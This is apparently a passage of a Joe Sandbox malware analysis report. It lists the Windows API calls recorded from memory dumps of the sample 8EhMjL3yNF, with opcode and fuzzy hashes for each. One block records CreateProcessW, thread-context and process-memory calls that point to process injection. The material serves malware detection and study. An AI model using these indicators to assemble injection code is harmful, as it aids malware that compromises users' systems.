                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2429186680-0
                                                                                                                                                                  • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                                  • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DesktopFolderFromListMallocPath
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2281215042-0
                                                                                                                                                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                                                                  APIs
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                  • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                  • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                                                                  • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                  • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                                                                  APIs
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                                  • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                                                  • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                                                                                                  • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                                                  • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                  • Opcode ID: f324077346500a475a04602cd4b44258b9806dd725a659715d7844d6d80d8dc3
                                                                                                                                                                  • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                                                                                  • Opcode Fuzzy Hash: f324077346500a475a04602cd4b44258b9806dd725a659715d7844d6d80d8dc3
                                                                                                                                                                  • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
APIs
• GetStartupInfoW.KERNEL32(?,0048D0C8,00000058), ref: 00416464
• GetCommandLineW.KERNEL32 ref: 00416503
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CommandInfoLineStartup
• String ID:
• API String ID: 582193876-0
• Opcode ID: 91c8eb4da3c7ff8427515efb3e276b6205f2762f3b55875094efa67c6b890b0c
• Instruction ID: ac7b2a7a110525a15761c18fac9a87cb5f7107ef6e751cb88c520a6366d35d41
• Opcode Fuzzy Hash: 91c8eb4da3c7ff8427515efb3e276b6205f2762f3b55875094efa67c6b890b0c
• Instruction Fuzzy Hash: AA317070940310AADB24BBB2A846BEE3674AF10759F11442FF505AA1D6EB7CC9C1CB9D
APIs
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
• FreeLibrary.KERNEL32(?), ref: 0040D78E
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FreeInfoLibraryParametersSystem
• String ID:
• API String ID: 3403648963-0
• Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
• Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
• Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
• Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
• Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
• Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
• Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
APIs
• SetFilePointer.KERNELBASE(00000000,00000109,00000000,004229EE,00000000,00000109,?,004229EE,00000109,00000000,00000000), ref: 0041E1AE
• GetLastError.KERNEL32(?,004229EE,00000109,00000000,00000000), ref: 0041E1BB
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 3e97f01922c1d7d6761d37e8c042bb033ea193a6ffb3200a7d889d99da883567
• Instruction ID: 3a52d99af4889aacde1065dfe3576237307748e1d7dc14bc5ca1c9168610e971
• Opcode Fuzzy Hash: 3e97f01922c1d7d6761d37e8c042bb033ea193a6ffb3200a7d889d99da883567
• Instruction Fuzzy Hash: 1F01F4366146517FC6111BBE9C089DB3B689F82334B210727FD31CB1E1DB38C88197A9
APIs
• RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
• GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 58c48c5ad80d96b9acf5d244c9eac1548db561dba17a1218556d1964a8a8cdaa
• Instruction ID: 2371a508b7b006657431296420ef66ac3e5da02846a4165df707855177eb7138
• Opcode Fuzzy Hash: 58c48c5ad80d96b9acf5d244c9eac1548db561dba17a1218556d1964a8a8cdaa
• Instruction Fuzzy Hash: 7BE08C72004204ABCB212FB1EC08BDA3BA8AB40755F20447EF958C61A0DA7999C1C79C
APIs
• CloseHandle.KERNELBASE(00000000,00000000,00000109,?,004227A8,00000109), ref: 0041D7B4
• GetLastError.KERNEL32(?,004227A8,00000109), ref: 0041D7BE
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: 291c0696bda2c6d0ea991a4c2892309895d6b13f0ed428eaface8a755dd0f5b9
• Instruction ID: ee47189d5b6865b493d8c5c3ed26ce1959f7700021d2ad05630b2f7cd03a2383
• Opcode Fuzzy Hash: 291c0696bda2c6d0ea991a4c2892309895d6b13f0ed428eaface8a755dd0f5b9
• Instruction Fuzzy Hash: 3B01DB72D056501AD225373D6849FEB2B854F82739F29052BF8798B2D2DE6DCCC1825D
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 04401AA3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04401B39
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04401B5B
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
  • Part of subcall function 00418752: GetModuleFileNameW.KERNEL32(00000000,00496872,00000104,00000001,004115F6,00000000), ref: 004187EE
  • Part of subcall function 00411682: ExitProcess.KERNEL32 ref: 00411693
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AllocateExitFileHeapModuleNameProcess
• String ID:
• API String ID: 1715456479-0
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,004164CD), ref: 00419D63
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
APIs
• GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                  • Opcode ID: f25d88b078144904bc5f108aaf886b145ed4007a512393d5c0d79f2ba5d3833f
                                                                                                                                                                  • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                                                                  • Opcode Fuzzy Hash: f25d88b078144904bc5f108aaf886b145ed4007a512393d5c0d79f2ba5d3833f
                                                                                                                                                                  • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000001,004115F6,?,00418256,00000018,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D,?,004115F6), ref: 00416B25
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeapSleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4201116106-0
                                                                                                                                                                  • Opcode ID: 5d235bca9f66459b9abae02b4cc3e09111839f09c7b85c5a4bac4fb0e10ac7ef
                                                                                                                                                                  • Instruction ID: 29b66831f95231b605567f83fe554f9f415e617bc059c2b68adb7d8a9d008894
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d235bca9f66459b9abae02b4cc3e09111839f09c7b85c5a4bac4fb0e10ac7ef
                                                                                                                                                                  • Instruction Fuzzy Hash: B4E092329055255787306E7BE8448CB7B5ADBC13B1326073BF939C23D0D734ED828698
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                  • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                                                  • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
